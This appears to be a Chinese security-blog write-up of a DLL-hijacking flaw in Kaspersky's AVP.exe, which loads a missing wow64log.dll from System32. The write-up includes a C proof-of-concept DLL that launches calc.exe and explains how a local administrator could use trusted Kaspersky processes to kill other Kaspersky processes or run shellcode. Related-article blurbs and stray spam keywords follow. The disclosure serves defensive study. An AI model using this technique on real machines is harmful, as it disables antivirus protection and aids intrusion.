<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Kaspersky AVP.exe DLL 劫持

    VSole2022-07-21 22:53:31

    Kaspersky AVP.exe 中的 DLL 注入允許本地管理員在不知道 Kaspersky 密碼的情況下殺死或篡改防病毒軟件和在高權限中執行命令。

    在Kaspersky AVP.exe進程嘗試加載缺少的wow64log.dllDLL文件(在System32)。

    通過DLL植入惡意文件,本地Windows管理員可以在這個受信任的AVP.exe進程的上下文中實現代碼執行并殺死其他進程,從而在無法檢測和清除病毒的殺毒軟件上實現拒絕服務和以卡巴斯基的身份執行任意命令。

    版本

    卡巴斯基安全軟件

    AVP.exe版本

    Kaspersky Password Manager Service

    卡巴斯基安全軟件啟動的進程為:

    Kaspersky Password Manager Service啟動的進程為:

    ProCess Monitor

    AVP.exe 加載不存在的wow64log.dll,路徑為C:\windows\System32\

    Avpui.exe同樣加載不存在的Wow64log.dll,路徑為C:\windows\System32\

    kpm.exe同樣加載不存在的Wow64log.dll,路徑為C:\windows\System32\

    wow64log.dll與 WoW64 Windows 機制有關,該機制允許在 64 位 Windows 上運行 32 位程序。該子系統會自動嘗試加載它,但是它不存在于任何公共 Windows 版本中。

    C:\Windows\System (Windows95/98/Me)C:\WINNT\System32(WindowsNT/2000)C:\Windows\System32 (Windows XP,Vista,7,8,10)
    

    如果是64位文件C:\Windows\SysWOW64

    作為管理員,我們可以構造惡意 wow64log.dll 文件復制到 System32 。

    例如:

    #include "pch.h"#include #include #include #include #include 
    BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call,  LPVOID lpReserved){  STARTUPINFO si = { sizeof(si) };  PROCESS_INFORMATION pi;  CreateProcess(TEXT("C:\\Windows\\System32\\calc.exe"), NULL, NULL, NULL, false, 0, NULL, NULL, &si, &pi);
      switch (ul_reason_for_call)  {  case DLL_PROCESS_ATTACH:    char szFileName[MAX_PATH + 1];    GetModuleFileNameA(NULL, szFileName, MAX_PATH + 1);
        //check if we are injected in an interesting McAfee process    if (strstr(szFileName, "avp") != NULL      //|| strstr(szFileName, "mcshield") != NULL      || strstr(szFileName, "avp.exe") != NULL      ) {      DisableThreadLibraryCalls(hModule);    }    else    {
        }
      case DLL_THREAD_ATTACH:  case DLL_THREAD_DETACH:  case DLL_PROCESS_DETACH:    //log("detach");    break;  }  return TRUE;}
    

    手動復制在目標文件目錄中,然后啟動卡巴斯基,可以看到加載了我們的Wow64log.dll

    啟動Kaspersky Password Manager Service

    加載了我們的惡意DLL并執行了

    卡巴斯基具有自我保護機制,即使管理員也無法終止或注入Avp.exe /avpui.exe等等 進程。但似乎卡巴斯基家族的所有進程都認為其他卡巴斯基進程在自我保護方面是“受信任的”。因此,如果我們設法在一個上下文中執行代碼,我們就可以“攻擊”并殺死其進程和在卡巴斯基中執行任意命令等等。

    我們可以編譯一個惡意的dll利用卡巴斯基的進程去kill其它卡巴斯基的進程。

    也可以在卡巴是安全上下文中執行我們的shellcode 例如:

    卡巴斯基dll劫持
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Kaspersky AVP.exe DLL 劫持
    2022-07-21 22:53:31
    Kaspersky AVP.exe 中的 DLL 注入允許本地管理員在不知道 Kaspersky 密碼的情況
    每個供應商的產品都有問題,攻擊者只要已經在系統上就可以提升權限。 CyberArk最近一項研究發現,公司企業用來防御惡意軟件攻擊的大多數安全工具本身易遭漏洞利用,可使攻擊者能夠在受感染的系統上提升權限。 CyberA...
    在2022年2月,卡巴斯基實驗室的研究人員首次觀察到將shellcode放入Windows事件日志的技術。該技術允許在文件系統中隱藏“無文件”最后stager的木馬。這種對活動中事件日志的關注不僅限于存儲 shellcode。Dropper 模塊還修復了與事件跟蹤 (ETW) 和反惡意軟件掃描接口 (AMSI) 相關的 Windows 原生 API 函數,以使感染過程更加隱蔽。
    安全研究人員近期注意到一個利用 Windows 事件日志來存儲惡意軟件的活動,這項技術此前并沒有被記錄用于黑客攻擊。這種方法使攻擊者能夠在文件系統中植入無文件的惡意軟件,這種攻擊充滿了技術和模塊,旨在盡可能保持活動的隱蔽性。
    今天是微軟 2023 年 4 月的補丁星期二,安全更新修復了一個被積極利用的零日漏洞,共計 97 個漏洞。七個漏洞因允許遠程代碼執行而被歸類為“嚴重”,這是最嚴重的漏洞。如果某個漏洞被公開披露或被積極利用但沒有可用的官方修復程序,Microsoft 會將其歸類為零日漏洞。因此,強烈建議 Microsoft Office 用戶盡快安裝今天的安全更新。
    威脅團伙利用TeamCity CVE-2023-42793漏洞展開攻擊
    今年早些時候,受歡迎的VoIP程序3CXDesktopApp的木馬化版本被用于“套娃式”供應鏈攻擊。攻擊者能夠將惡意代碼嵌入到libffmpeg媒體處理庫中,以便從他們的服務器下載有效負載。
    研究人員稱,作為該過程的一部分,DLL被綁定到Windows注冊表項中的目標進程,但攻擊者可以用惡意DLL替換真正的DLL。反病毒應用程序是防止任何惡意軟件運行的系統的主要防御。研究人員表示,目前市場上的大多數安全產品都容易受到雙重代理攻擊。
    總共發現了多達80個惡意模塊。DarkUniverse目前尚未被公開公布,也不清楚2017年之后它發生了什么。成功利用這些漏洞后,由四個模塊組成的自定義惡意軟件將被發送到受感染的系統。研究人員將APT稱為“PuzzleMaker”。它被稱為“USB Thief”,由六個文件組成,其中兩個是配置文件,而其他四個是可執行文件。這種惡意軟件并不普遍,極有可能用于涉及人力資源的高度針對性攻擊。到目前為止,尚未發現該攻擊者與任何已知的APT組織之間存在聯系。
    Ducktail 竊取惡意軟件背后的越南威脅行為者與 2023 年 3 月至 10 月初開展的一項新活動有關,該活動針對印度的營銷專業人士,旨在劫持 Facebook 企業帳戶。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类